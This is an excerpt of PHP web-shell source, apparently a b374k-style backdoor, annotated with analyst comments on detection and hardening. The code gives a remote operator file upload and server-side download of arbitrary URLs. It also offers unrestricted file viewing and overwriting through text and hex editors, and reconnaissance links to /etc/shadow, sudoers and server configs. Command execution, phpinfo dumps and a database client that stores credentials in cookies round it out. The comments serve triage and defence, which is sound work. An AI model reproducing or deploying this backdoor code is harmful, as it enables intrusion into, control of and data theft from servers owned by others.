  1885. <tr><td>cc_encryption_hash</td>
  1886. <td><input style='color:#FF0000;background-color:#000000' type='text' size='60' name='anu5'></td></tr>
  1887. </table><br>
  1888. <INPUT class=submit type='submit' style='color:#FF0000;background-color:#000000' value=' HAJAR BOS ' name='plapon'>
  1889. </FORM></center>";
  1890.  
  1891. }
  1892. //// UPLOADFILE /////
        // Analyst notes: upload panel, reached with x=upload. Two paths:
        //   uploadhd  -> multipart upload in field filepath, moved with move_uploaded_file() to
        //                savefolder + (savefilename or the client-supplied name)
        //   uploadurl -> server-side fetch of fileurl through dlfile() (defined outside this
        //                excerpt), saved to savefolderurl + (savefilenameurl or the URL basename)
        // The destination directory is created when missing, and this excerpt applies no check
        // on file name or type beyond ss()/cp(), whose behaviour is not visible here.
        // Detection: multipart POSTs to a script that is not a known upload endpoint, outbound
        // HTTP(S) connections initiated by the web server, and new files appearing in
        // web-served directories.
        // Hardening: egress filtering for the web tier, code directories not writable by the web
        // server account, and no script execution in directories that must stay writable.
  1893.  
  1894. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='upload')){
  1895. $s_result = " ";
  1896. $s_msg = "";
  1897. if(isset($_REQUEST['uploadhd'])){
  1898. $s_fn = $_FILES['filepath']['name'];
  1899. if(is_uploaded_file($_FILES['filepath']['tmp_name'])){
  1900. $s_p = cp(ss($_REQUEST['savefolder']));
  1901. if(!is_dir($s_p)) mkdir($s_p);
  1902. if(isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename'])!="")) $s_fn = ss($_REQUEST['savefilename']);
  1903. $s_tm = $_FILES['filepath']['tmp_name'];
  1904. $s_pi = cp($s_p).$s_fn;
  1905. $s_st = @move_uploaded_file($s_tm,$s_pi);
  1906. if($s_st)
  1907. $s_msg = "<p class='notif'>File uploaded to <a href='".$s_self."view=".$s_pi."' onclick='return false;'>".$s_pi."</a></p>";
  1908. else $s_msg = "<p class='notif'>Failed to upload ".$s_fn."</p>";
  1909. }
  1910. else $s_msg = "<p class='notif'>Failed to upload ".$s_fn."</p>";
  1911. }
  1912.  
        // Remote fetch: the server, not the operator's browser, retrieves the URL
  1913. elseif(isset($_REQUEST['uploadurl'])){
  1914. // function dlfile($s_url,$s_fpath){
  1915. $s_p = cp(ss($_REQUEST['savefolderurl']));
  1916. if(!is_dir($s_p)) mkdir($s_p);
  1917. $s_fu = ss($_REQUEST['fileurl']);
  1918. $s_fn = basename($s_fu);
  1919. if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $s_fn = ss($_REQUEST['savefilenameurl']);
  1920. $s_fp = cp($s_p).$s_fn;
  1921. $s_st = dlfile($s_fu,$s_fp);
  1922. if($s_st) $s_msg = "<p class='notif'>File uploaded to <a href='".$s_self."view=".$s_fp."' onclick='return false;'>".$s_fp."</a></p>";
  1923. else $s_msg = "<p class='notif'>Failed to upload ".$s_fn."</p>";
  1924. }else{
  1925. if(!is_writable($s_cwd)) $s_msg = "<p class='notif'>Directory ".$s_cwd." is not writable, please change to a writable one</p>";
  1926. }
  1927.  
  1928. if(!empty($s_msg)) $s_result .= $s_msg;
  1929.  
  1930. $s_result .= "<form action='".$s_self."' method='post' enctype='multipart/form-data'>
  1931. <div class='mybox'><h2>Upload from computer</h2>
  1932. <table class='myboxtbl'>
  1933. <tr><td style='width:140px;'>File</td><td><input type='file' name='filepath' class='inputzbut' style='width:400px;margin:0;' />
  1934. </td></tr>
  1935. <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolder' value='".$s_cwd."' /></td></tr>
  1936. <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilename' value='' /></td></tr>
  1937. <tr><td>&nbsp;</td><td>
  1938. <input type='submit' name='uploadhd' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  1939. <input type='hidden' name='x' value='upload' />
  1940. </td></tr>
  1941. </table></div></form>
  1942.  
  1943. <form action='".$s_self."' method='post'>
  1944. <div class='mybox'><h2>Upload from internet</h2>
  1945. <table class='myboxtbl'>
  1946. <tr><td style='width:150px;'>File URL</td><td><input style='width:100%;' class='inputz' type='text' name='fileurl' value='' />
  1947. </td></tr>
  1948. <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolderurl' value='".$s_cwd."' /></td></tr>
  1949. <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilenameurl' value='' /></td></tr>
  1950. <tr><td>&nbsp;</td><td>
  1951. <input type='submit' name='uploadurl' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  1952. <input type='hidden' name='x' value='upload' />
  1953. </td></tr>
  1954. </table></div></form>";
  1955. }
  1956.  
  1957.  
  1958. // view file
  1959. elseif(isset($_REQUEST['view'])){
        // Branch for the 'view' request parameter: renders metadata, action links and a
        // content preview for a file, or a listing when the path is a directory.
        // NOTE(review): the path is taken from $_REQUEST through ss() (defined outside
        // this chunk); no base-directory restriction is visible in this branch, so the
        // reachable files are bounded only by what the PHP process can read.
  1960. $s_f = ss($_REQUEST['view']);
        // $s_fnew is not assigned in this chunk; when it is set and non-blank it
        // replaces the requested path.
  1961. if(isset($s_fnew) && (trim($s_fnew)!="")) $s_f = $s_fnew;
  1962.  
  1963. $s_owner = "";
  1964. if(is_file($s_f)){
        // Side effects: the working directory moves to the file's directory and that
        // directory is stored in the 'cwd' cookie for $s_login_time seconds.
  1965. $targetdir = dirname($s_f);
  1966. chdir($targetdir);
  1967. $s_cwd = cp(getcwd());
  1968. setcookie("cwd", $s_cwd ,time() + $s_login_time);
  1969.  
        // Owner/group names are resolved only on non-Windows hosts with POSIX support
        // ($s_win and $s_posix are set outside this chunk).
  1970. if(!$s_win && $s_posix){
  1971. $s_name = posix_getpwuid(fileowner($s_f));
  1972. $s_group = posix_getgrgid(filegroup($s_f));
  1973. $s_owner = "<tr><td>Owner</td><td>".$s_name['name']."<span class='gaya'>:</span>".$s_group['name']."</td></tr>";
  1974. }
  1975. $s_filn = basename($s_f);
        // get_archiver_available() is defined elsewhere; its output carries the
        // __dlpath__ / __dlcwd__ placeholders that are filled in here.
  1976. $s_dlfile = get_archiver_available();
  1977. $s_dlfile = str_replace("__dlpath__",$s_filn,$s_dlfile);
  1978. $s_dlfile = str_replace("__dlcwd__",$s_cwd,$s_dlfile);
        // NOTE(review): $s_f is concatenated into HTML text, attribute values and hrefs
        // below without any escaping in this block; only the element ids pass through
        // cs() (defined elsewhere). A path containing quotes or markup is reflected
        // as-is into the page.
  1979. $s_result .= "<table class='viewfile' style='width:100%;'>
  1980. <tr><td style='width:140px;'>Filename</td><td><span id='".cs($s_filn)."_link'>".$s_f."</span>
  1981. <div id='".cs($s_filn)."_form' class='sembunyi'>
  1982. <form action='".$s_self."' method='post'>
  1983. <input type='hidden' name='oldname' value='".$s_f."' style='margin:0;padding:0;' />
  1984. <input type='hidden' name='view' value='".$s_f."' />
  1985. <input class='inputz' style='width:200px;' type='text' name='newname' value='".$s_f."' />
  1986. <input class='inputzbut' type='submit' name='rename' value='rename' />
  1987. </form>
  1988. <input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($s_filn)."_form','".cs($s_filn)."_link');\" />
  1989. </div>
  1990. </td></tr>
  1991. <tr><td>Size</td><td>".gs($s_f)." (".@filesize($s_f).")</td></tr>
  1992. <tr><td>Permission</td><td>".gp($s_f)."</td></tr>
  1993. ".$s_owner."
  1994. <tr><td>Create time</td><td>".@date("d-M-Y H:i:s",filectime($s_f))."</td></tr>
  1995. <tr><td>Last modified</td><td>".@date("d-M-Y H:i:s",filemtime($s_f))."</td></tr>
  1996. <tr><td>Last accessed</td><td>".@date("d-M-Y H:i:s",fileatime($s_f))."</td></tr>
  1997. <tr><td>Actions</td><td>
  1998. <a href='".$s_self."edit=".$s_f."' title='edit' onclick='return false;'>edit</a> |
  1999. <a href='".$s_self."hexedit=".$s_f."' title='edit as hex' onclick='return false;'>hex</a> |
  2000. <a href=\"javascript:tukar('".cs($s_filn)."_link','".cs($s_filn)."_form');\" title='rename'>ren</a> |
  2001. <a href='".$s_self."del=".$s_f."' title='delete' onclick='return false;'>del</a> ".$s_dlfile."
  2002. </td></tr>
  2003. <tr><td>View</td><td>
  2004. <a href='".$s_self."view=".$s_f."&type=text' onclick='return false;'>text</a> |
  2005. <a href='".$s_self."view=".$s_f."&type=code' onclick='return false;'>code</a> |
  2006. <a href='".$s_self."view=".$s_f."&type=image' onclick='return false;'>image</a> |
  2007. <a href='".$s_self."view=".$s_f."&type=audio' onclick='return false;'>audio</a> |
  2008. <a href='".$s_self."view=".$s_f."&type=video' onclick='return false;'>video</a>
  2009. </td></tr>
  2010. </table>
  2011. ";
  2012.  
  2013. $s_t = "";
  2014.  
        // Preview type detection: the extension is looked up in a compressed MIME table
        // ($s_mime_types, defined outside this chunk).
        // NOTE(review): $s_ext is interpolated into the pattern without preg_quote(),
        // so regex metacharacters in the extension change what is matched.
  2015. $s_mime = "";
  2016. $s_mime_list = gzinflate(base64_decode($s_mime_types));
  2017. $s_ext = trim(substr($s_f, strrpos($s_f, ".")),".");
  2018. if(preg_match("/([^\s]+)\ .*\b$s_ext\b.*/i",$s_mime_list,$s_r)){
  2019. $s_mime = $s_r[1];
  2020. }
  2021.  
        // Precedence: names ending in "php" are shown as code, then anything
        // getimagesize() recognises is an image, then the major MIME type is used.
  2022. $s_iinfo = @getimagesize($s_f);
  2023. if(strtolower(substr($s_filn,-3,3)) == "php") $s_t = "code";
  2024. elseif(is_array($s_iinfo)) $s_t = 'image';
  2025. elseif(!empty($s_mime)) $s_t = substr($s_mime,0,strpos($s_mime,"/"));
  2026.  
        // A caller-supplied 'type' overrides the detected preview type.
  2027. if(isset($_REQUEST['type'])) $s_t = ss($_REQUEST['type']);
  2028.  
  2029. if($s_t=="image"){
        // NOTE(review): when 'type' was forced to "image" for a file getimagesize()
        // rejected, $s_iinfo is not an array and the index reads below operate on a
        // non-array value.
  2030. $s_width = (int) $s_iinfo[0];
  2031. $s_height = (int) $s_iinfo[1];
  2032. $s_imginfo = "Image type = ( ".$s_iinfo['mime']." )<br />
  2033. Image Size = <span class='gaul'>( </span>".$s_width." x ".$s_height."<span class='gaul'> )</span><br />";
        // Display width is capped at 800; wider images get a "view full size" link.
  2034. if($s_width > 800){
  2035. $s_width = 800;
  2036. $s_imglink = "<p><a href='".$s_self."img=".$s_filn."' onclick='return false;'>
  2037. <span class='gaul'>[ </span>view full size<span class='gaul'> ]</span></a></p>";
  2038. }
  2039. else $s_imglink = "";
  2040.  
  2041. $s_result .= "<div class='viewfilecontent' style='text-align:center;'>".$s_imglink."
  2042. <img width='".$s_width."' src='".$s_self."img=".$s_filn."' alt='".$s_filn."' style='margin:8px auto;padding:0;border:0;' /></div>";
  2043.  
  2044. }
  2045. elseif($s_t=="code"){
        // The file is wrapped at 160 columns, passed through highlight_string(), and
        // the default highlight colours are swapped for the active theme's palette.
  2046. $s_result .= "<div class=\"viewfilecontent\">";
  2047. $s_file = wordwrap(@file_get_contents($s_f),160,"\n",true);
  2048. $s_buff = highlight_string($s_file,true);
  2049. $s_old = array("0000BB","000000","FF8000","DD0000", "007700");
  2050. $s_new = ($s_theme=="bright")?$s_highlight_bright:$s_highlight_dark;
  2051. $s_buff = str_replace($s_old,$s_new, $s_buff);
  2052. $s_result .= $s_buff;
  2053. $s_result .= "</div>";
  2054. }
  2055. elseif($s_t=="audio" || $s_t=="video"){
        // $s_t is one of the two literals tested above, so it is safe as a tag name;
        // $s_f and $s_mime are written into the attributes unescaped.
  2056. $s_result .= "<div class='viewfilecontent' style='text-align:center;'>
  2057. <".$s_t." controls>
  2058. <source src='".$s_self."dltype=raw&dlpath=".$s_f."' type='".$s_mime."'>
  2059. <object data='".$s_self."dltype=raw&dlpath=".$s_f."'>
  2060. <embed src='".$s_self."dltype=raw&dlpath=".$s_f."'>
  2061. </object>
  2062. </".$s_t.">
  2063. </div>";
  2064. }
  2065. else {
        // Plain-text fallback: only '<' and '>' are replaced with entities; '&' and
        // quote characters in the file are emitted unchanged.
  2066. $s_result .= "<pre style='padding: 3px 8px 0 8px;' class='viewfilecontent'>";
  2067. $s_result .= str_replace("<","&lt;",str_replace(">","&gt;",(wordwrap(@file_get_contents($s_f),160,"\n",true))));
  2068. $s_result .= "</pre>";
  2069. }
  2070. }
  2071. elseif(is_dir($s_f)){
        // Directory path: change into it, persist it in the 'cwd' cookie and render
        // the listing through showdir() (defined outside this chunk).
  2072. chdir($s_f);
  2073. $s_cwd = cp(getcwd());
  2074. setcookie("cwd", $s_cwd ,time() + $s_login_time);
  2075. $s_result .= showdir($s_cwd);
  2076. }
        // NOTE(review): the requested path is echoed back unescaped in the message.
  2077. else $s_result .= "<p class='notif'>Cannot find the path specified ".$s_f."</p>";
  2078.  
  2079. } // edit file
  2080. elseif(isset($_REQUEST['edit'])){
        // Branch for the 'edit' request parameter: shows a file in a textarea and, when
        // 'fc' is also supplied, overwrites the target path with the submitted content.
        // NOTE(review): this is an arbitrary file write bounded only by the PHP
        // process's filesystem permissions; no path restriction is visible here.
        // For triage, file modifications made by the web-server account that coincide
        // with requests carrying 'edit' and 'fc' fields are the trace this leaves.
  2081. $s_f = ss($_REQUEST['edit']);
  2082. $s_fc = "";
  2083. $s_fcs = "";
  2084.  
        // new=yes avoids clobbering an existing file: the text after the last '_' is
        // read as a counter and incremented until "<prefix>_<n>" does not exist.
        // NOTE(review): when the name contains no '_', $s_pos is false and the prefix
        // taken by substr($s_f,0,$s_pos) is empty - confirm whether that is intended.
  2085. if(isset($_REQUEST['new']) && ($_REQUEST['new']=='yes')){
  2086. $s_num = 1;
  2087. if(is_file($s_f)){
  2088. $s_pos = strrpos($s_f,"_");
  2089. if($s_pos!==false) $s_num = (int) substr($s_f,$s_pos+1);
  2090. while(is_file(substr($s_f,0,$s_pos)."_".$s_num)){
  2091. $s_num++;
  2092. }
  2093. $s_f = substr($s_f,0,$s_pos)."_".$s_num;
  2094. }
  2095. }
  2096. else if(is_file($s_f)) $s_fc = @file_get_contents($s_f);
  2097.  
  2098.  
        // Save path: mode "w" truncates the file before writing. $s_fcs carries the
        // status text shown to the user. ssc() is defined outside this chunk.
  2099. if(isset($_REQUEST['fc'])){
  2100. $s_fc = ssc($_REQUEST['fc']);
  2101. if($s_filez = fopen($s_f,"w")){
  2102. $s_time = @date("d-M-Y H:i:s",time());
  2103. if(fwrite($s_filez,$s_fc)!==false) $s_fcs = "File saved @ ".$s_time;
  2104. else $s_fcs = "Failed to save";
  2105. fclose($s_filez);
  2106. }
  2107. else $s_fcs = "Permission denied";
  2108. }
  2109. else if(is_file($s_f) && !is_writable($s_f)) $s_fcs = "This file is not writable";
  2110.  
        // The file content is escaped through hss() (defined elsewhere) before it is
        // placed in the textarea; the path in the 'edit' input's value is not escaped.
  2111. if(!empty($s_fcs)) $s_result .= "<p class='notif'>".$s_fcs."</p>";
  2112. $s_result .= "<form action='".$s_self."' method='post'>
  2113. <textarea id='fc' name='fc' class='txtarea'>".hss($s_fc)."</textarea>
  2114. <p style='text-align:center;'><input type='text' class='inputz' style='width:99%;' name='edit' value='".$s_f."' /></p>
  2115. <p><input type='submit' name='fcsubmit' class='inputzbut' value='Save !' style='width:120px;height:30px;' /></p>
  2116. </form>";
  2117.  
  2118. }// hex edit file
  2119. elseif(isset($_REQUEST['hexedit'])){
        // Branch for the 'hexedit' request parameter: renders a file as rows of 32
        // bytes (address, editable hex, printable dump) and, when hex data is
        // submitted, writes the decoded bytes back to the target path.
        // NOTE(review): like the text editor branch, this writes caller-supplied bytes
        // to a caller-supplied path with no restriction visible in this branch.
  2120. $s_f = ss($_REQUEST['hexedit']);
  2121. $s_fc = "";
  2122. $s_fcs = "";
  2123. $s_lnum = 0;
  2124. $s_hexes = "";
  2125.  
        // Two input forms are accepted: the per-row 'hexes[]' fields (spaces stripped
        // and concatenated) or a single 'hexestxtarea' blob.
        // Assumes 'hexes' arrives as an array, as the form's hexes[] inputs produce.
  2126. if(!empty($_REQUEST['hexes']) || !empty($_REQUEST['hexestxtarea'])){
  2127. if(!empty($_REQUEST['hexes'])){
  2128. foreach($_REQUEST['hexes'] as $s_hex) $s_hexes .= str_replace(" ","", $s_hex);
  2129. }
  2130. elseif(!empty($_REQUEST['hexestxtarea'])){
  2131. $s_hexes = trim($_REQUEST['hexestxtarea']);
  2132. }
        // Mode "w" truncates the file; pack("H*") turns the hex string into raw bytes.
  2133. if($s_filez = fopen($s_f,"w")){
  2134. $s_bins = pack("H*" , $s_hexes);
  2135. $s_time = @date("d-M-Y H:i:s",time());
  2136. if(fwrite($s_filez,$s_bins)!==false) $s_fcs = "File saved @ ".$s_time;
  2137. else $s_fcs = "Failed to save";
  2138. fclose($s_filez);
  2139. }
  2140. else $s_fcs = "Permission denied";
  2141. }
  2142. else if(is_file($s_f) && !is_writable($s_f)) $s_fcs = "This file is not writable";
  2143.  
        // NOTE(review): the path is placed in the 'hexedit' input's value unescaped.
  2144. if(!empty($s_fcs)) $s_result .= "<p class='notif'>".$s_fcs."</p>";
  2145. $s_result .= "<form action='".$s_self."' method='post'>
  2146. <p style='padding:0;text-align:center;'><input type='text' class='inputz' style='width:100%;' name='hexedit' value='".$s_f."' /></p>
  2147. <p class='border-bottom' style='padding:0 0 14px 0;'><input type='submit' name='fcsubmit' class='inputzbut' value='Save !' style='width:120px;height:30px;' onclick=\"return submithex();\" /></p>
  2148. <table class='explore'>
  2149. ";
  2150. if(is_file($s_f)){
  2151. $s_fp = fopen($s_f,"r");
  2152. if($s_fp) {
  2153. $s_ldump = "";
        // $s_counter numbers the rows (used in element ids); $s_icounter is the byte
        // offset shown in the address column.
  2154. $s_counter = 0;
  2155. $s_icounter = 0;
  2156. while(!feof($s_fp)){
  2157. $s_line = fread($s_fp, 32);
        // Dump column: bytes outside 0x21-0x7E become '.', and '<' / '>' are also
        // replaced so the dump cannot inject markup.
  2158. $s_linedump = preg_replace('/[^\x21-\x7E]/','.', $s_line);
  2159. $s_linedump = str_replace(">",".",$s_linedump);
  2160. $s_linedump = str_replace("<",".",$s_linedump);
        // Hex column: upper-case byte pairs separated by single spaces.
  2161. $s_linehex = strtoupper(bin2hex($s_line));
  2162. $s_linex = str_split($s_linehex,2);
  2163. $s_linehex = implode(" ", $s_linex);
  2164. $s_addr = sprintf("%08xh",$s_icounter);
  2165.  
  2166. $s_result .= "<tr><td style='text-align:center;width:60px;'>".$s_addr."</td><td style='text-align:left;width:594px;'>
  2167. <input onclick=\"hexupdate('".$s_counter."',event);\" onkeydown=\"return hexfix('".$s_counter."',event);\" onkeyup=\"hexupdate('".$s_counter."',event);\" type='text' class='inputz' id='hex_".$s_counter."' name='hexes[]' value='".$s_linehex."' style='width:578px;' maxlength='".strlen($s_linehex)."' /></td>
  2168. <td style='text-align:left;letter-spacing:2px;'>
  2169. <pre name='hexdump' id='dump_".$s_counter."' style='margin:0;padding:0;'>".$s_linedump."</pre></td></tr>";
  2170. $s_counter++;
  2171. $s_icounter+=32;
  2172. }
        // The row count and a hidden textarea are emitted for the client-side script
        // (submithex / hexupdate / hexfix are defined outside this chunk).
  2173. $s_result .= "<input type='hidden' id='counter' value='".$s_counter."' />";
  2174. $s_result .= "<textarea name='hexestxtarea' id='hexestxtarea' class='sembunyi'></textarea>";
  2175. fclose($s_fp);
  2176. }
  2177. }
  2178. $s_result .= "</table></form>";
  2179.  
  2180. }// show server information
  2181. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='info')){
        // Branch for x=info: builds a host reconnaissance page - disk space, interpreter
        // and compiler versions, readable system configuration files, /proc data and
        // the phpinfo() sections.
        // For triage: this branch reads the /etc and /proc paths listed below and runs
        // version commands through exe() (defined outside this chunk), so both file
        // access by the web-server account and child processes are observable traces.
        // Any output accumulated in $s_result before this point is discarded.
  2182. $s_result = "";
  2183. // server misc info
  2184. $s_result .= "<p class='notif' onclick=\"toggle('info_server')\">Server Info</p>";
  2185. $s_result .= "<div class='info' id='info_server'><table>";
  2186.  
        // Windows: probe drive letters A-Z; elsewhere: report the root partition.
  2187. if($s_win){
  2188. foreach (range("A","Z") as $s_letter){
  2189. if((is_dir($s_letter.":\\") && is_readable($s_letter.":\\"))){
  2190. $s_drive = $s_letter.":";
  2191. $s_result .= "<tr><td>drive ".$s_drive."</td><td>".ts(disk_free_space($s_drive))." free of ".ts(disk_total_space($s_drive))."</td></tr>";
  2192. }
  2193. }
  2194. }
  2195. else $s_result .= "<tr><td>root partition</td><td>".ts(disk_free_space("/"))." free of ".ts(disk_total_space("/"))."</td></tr>";
  2196.  
        // The $s_python / $s_perl / $s_ruby / $s_node / $s_gcc / $s_java flags are set
        // outside this chunk; each one gates a version command run through exe().
  2197. $s_result .= "<tr><td>php</td><td>".phpversion()."</td></tr>";
  2198. if($s_python) $s_result .= "<tr><td>python</td><td>".exe("python -V")."</td></tr>";
  2199. if($s_perl) $s_result .= "<tr><td>perl</td><td>".exe("perl -e \"print \$]\"")."</td></tr>";
  2200. if($s_ruby) $s_result .= "<tr><td>ruby</td><td>".exe("ruby -v")."</td></tr>";
  2201. if($s_node) $s_result .= "<tr><td>node</td><td>".exe("node -v")."</td></tr>";
  2202.  
  2203.  
  2204.  
        // Only the first line of the gcc version output is shown.
  2205. if($s_gcc){
  2206. $s_gcc_version = exe("gcc --version");
  2207. $s_gcc_ver = explode("\n",$s_gcc_version);
  2208. if(count($s_gcc_ver)>0) $s_gcc_ver = $s_gcc_ver[0];
  2209. $s_result .= "<tr><td>gcc</td><td>".$s_gcc_ver."</td></tr>";
  2210. }
  2211. if($s_java) $s_result .= "<tr><td>java</td><td>".str_replace("\n", ", ", exe("java -version"))."</td></tr>";
  2212.  
        // Fixed list of account, network and service configuration files; each one
        // that is a readable regular file gets a link to the 'view' handler.
        // NOTE(review): the apache2.conf entry has a leading space inside the string,
        // so the check is made against that literal path including the space.
  2213. $s_interesting = array(
  2214. "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases", "/etc/resolv.conf", "/etc/sysctl.conf",
  2215. "/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf",
  2216. "/etc/ssh/sshd_config",
  2217. "/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf"," /etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf", "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf",
  2218. "/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf",
  2219. "/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules");
  2220. foreach($s_interesting as $s_f){
  2221. if(is_file($s_f) && is_readable($s_f))
  2222. $s_result .= "<tr><td>".$s_f."</td><td><a href='".$s_self."view=".$s_f."' onclick='return false;'>".$s_f." is readable</a></td></tr>";
  2223. }
  2224.  
  2225.  
  2226. $s_result .= "</table></div>";
  2227.  
  2228. if(!$s_win){
  2229. // cpu info
        // /proc/cpuinfo is split on blank lines into one table per block; a line is
        // shown only when it splits into exactly two parts on ':'.
  2230. if($s_i_buff=trim(@file_get_contents("/proc/cpuinfo"))){
  2231. $s_result .= "<p class='notif' onclick=\"toggle('info_cpu')\">CPU Info</p>";
  2232. $s_result .= "<div class='info' id='info_cpu'>";
  2233. $s_i_buffs = explode("\n\n", $s_i_buff);
  2234. foreach($s_i_buffs as $s_i_buffss){
  2235. $s_i_buffss = trim($s_i_buffss);
  2236. if($s_i_buffss!=""){
  2237. $s_i_buffsss = explode("\n",$s_i_buffss);
  2238. $s_result .= "<table>";
  2239. foreach($s_i_buffsss as $s_i){
  2240. $s_i = trim($s_i);
  2241. if($s_i!=""){
  2242. $s_ii = explode(":",$s_i);
  2243. if(count($s_ii)==2) $s_result .= "<tr><td>".$s_ii[0]."</td><td>".$s_ii[1]."</td></tr>";
  2244. }
  2245. }
  2246. $s_result .= "</table>";
  2247. }
  2248. }
  2249. $s_result .= "</div>";
  2250. }
  2251. // mem info
        // Same key:value rendering for /proc/meminfo; an empty line starts a new table.
  2252. if($s_i_buff=trim(@file_get_contents("/proc/meminfo"))){
  2253. $s_result .= "<p class='notif' onclick=\"toggle('info_mem')\">Memory Info</p>";
  2254. $s_i_buffs = explode("\n",$s_i_buff);
  2255. $s_result .= "<div class='info' id='info_mem'><table>";
  2256. foreach($s_i_buffs as $s_i){
  2257. $s_i = trim($s_i);
  2258. if($s_i!=""){
  2259. $s_ii = explode(":",$s_i);
  2260. if(count($s_ii)==2) $s_result .= "<tr><td>".$s_ii[0]."</td><td>".$s_ii[1]."</td></tr>";
  2261. }
  2262. else $s_result .= "</table><table>";
  2263. }
  2264. $s_result .= "</table></div>";
  2265. }
  2266. // partition
        // Runs of spaces are collapsed, then the text is split on a blank line into a
        // header part and a rows part.
        // NOTE(review): $s_i_buffs[1] is read without checking that the blank-line
        // split produced a second element.
  2267. if($s_i_buff=trim(@file_get_contents("/proc/partitions"))){
  2268. $s_i_buff = preg_replace("/\ +/"," ",$s_i_buff);
  2269. $s_result .= "<p class='notif' onclick=\"toggle('info_part')\">Partitions Info</p>";
  2270. $s_result .= "<div class='info' id='info_part'>";
  2271. $s_i_buffs = explode("\n\n", $s_i_buff);
  2272. $s_result .= "<table><tr>";
  2273. $s_i_head = explode(" ",$s_i_buffs[0]);
  2274. foreach($s_i_head as $s_h) $s_result .= "<th>".$s_h."</th>";
  2275. $s_result .= "</tr>";
  2276. $s_i_buffss = explode("\n", $s_i_buffs[1]);
  2277. foreach($s_i_buffss as $s_i_b){
  2278. $s_i_row = explode(" ",trim($s_i_b));
  2279. $s_result .= "<tr>";
  2280. foreach($s_i_row as $s_r) $s_result .= "<td style='text-align:center;'>".$s_r."</td>";
  2281. $s_result .= "</tr>";
  2282. }
  2283. $s_result .= "</table>";
  2284. $s_result .= "</div>";
  2285. }
  2286. }
        // One collapsible section per phpinfo() category.
  2287. $s_phpinfo = array(
  2288. "PHP General" => INFO_GENERAL,
  2289. "PHP Configuration" => INFO_CONFIGURATION,
  2290. "PHP Modules" => INFO_MODULES,
  2291. "PHP Environment" => INFO_ENVIRONMENT,
  2292. "PHP Variables" => INFO_VARIABLES
  2293. );
  2294. foreach($s_phpinfo as $s_p=>$s_i){
  2295. $s_result .= "<p class='notif' onclick=\"toggle('".$s_i."')\">".$s_p."</p>";
        // phpinfo() is invoked through eval() on a built string; the argument is one
        // of the INFO_* constants from the array above, not request data. The output
        // is captured with output buffering and only the part between <body> and
        // </body> is kept.
        // NOTE(review): the strpos() results are used without checking for false.
  2296. ob_start();
  2297. eval("phpinfo(".$s_i.");");
  2298. $s_b = ob_get_contents();
  2299. ob_end_clean();
  2300. $s_a = strpos($s_b,"<body>")+6;
  2301. $s_z = strpos($s_b,"</body>");
  2302. $s_body = substr($s_b,$s_a,$s_z-$s_a);
        // Spaces are added after ',' and ';' - presumably so long values can wrap.
  2303. $s_body = str_replace(",",", ",$s_body);
  2304. $s_body = str_replace("&amp;","&",$s_body);
  2305. $s_body = str_replace(";","; ",$s_body);
  2306. //$s_body = str_replace("%3A%22","%3A%22 ",$s_body);
  2307. $s_result .= "<div class='info' id='".$s_i."'>".$s_body."</div>";
  2308. }
  2309. } // working with database
  2310. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='db')){
        // Branch for x=db: a database client. It keeps connection profiles in cookies,
        // connects with caller-supplied credentials, runs caller-supplied SQL and, when
        // no SQL is given, enumerates databases and tables.
        // For triage: the connection parameters (sqlhost, sqlport, sqluser, sqlpass,
        // sqltype) and the SQL text (sqlcode) travel as request fields and, for the
        // generated links, in URL query strings - so they can surface in web-server
        // access logs and are worth searching for during incident response.
  2311. // sqltype : mysql, mssql, oracle, pgsql, odbc, pdo
  2312. $s_sql = array();
  2313. $s_sql_deleted = "";
        // 'dc' names a saved connection to drop: its cookie c[<key>] is expired.
  2314. if(isset($_REQUEST['dc'])){
  2315. $k = $_REQUEST['dc'];
  2316. setcookie("c[".$k."]", "" ,time() - $s_login_time);
  2317. $s_sql_deleted = $k;
  2318. }
  2319.  
  2320. if(isset($_COOKIE['c']) && !isset($_REQUEST['connect'])){
  2321. foreach($_COOKIE['c'] as $c=>$d){
  2322. if($c==$s_sql_deleted) continue;
        // NOTE(review): json_encode / json_decode are passed to function_exists() as
        // bare words, not quoted names; PHP 8 raises an Error for an undefined
        // constant, older versions fall back to the string with a diagnostic.
        // NOTE(review): when the JSON functions are reported missing the cookie value
        // goes to unserialize(); cookie data is client-controlled, which makes this an
        // object-injection risk.
  2323. $s_dbcon = (function_exists(json_encode) && function_exists(json_decode))?json_decode($d):unserialize($d);
  2324. foreach($s_dbcon as $k=>$v) $s_sql[$k] = $v;
  2325. $s_sqlport = (!empty($s_sql['port']))? ":".$s_sql['port']:"";
        // NOTE(review): the saved password is written into the 'connect' link's query
        // string in clear text, and none of the cookie-derived values are escaped.
  2326. $s_result .= "<p class='notif'>[".$s_sql['type']."] ".$s_sql['user']."@".$s_sql['host'].$s_sqlport."
  2327. <span style='float:right;'><a href='".$s_self."x=db&connect=connect&sqlhost=".$s_sql['host']."&sqlport=".$s_sql['port']."&sqluser=".$s_sql['user']."&sqlpass=".$s_sql['pass']."&sqltype=".$s_sql['type']."' onclick='return false;'>connect</a> | <a href='".$s_self."x=db&dc=".$c."' onclick='return false;'>disconnect</a></span>
  2328. </p>";
  2329. }
  2330. }
  2331. else{
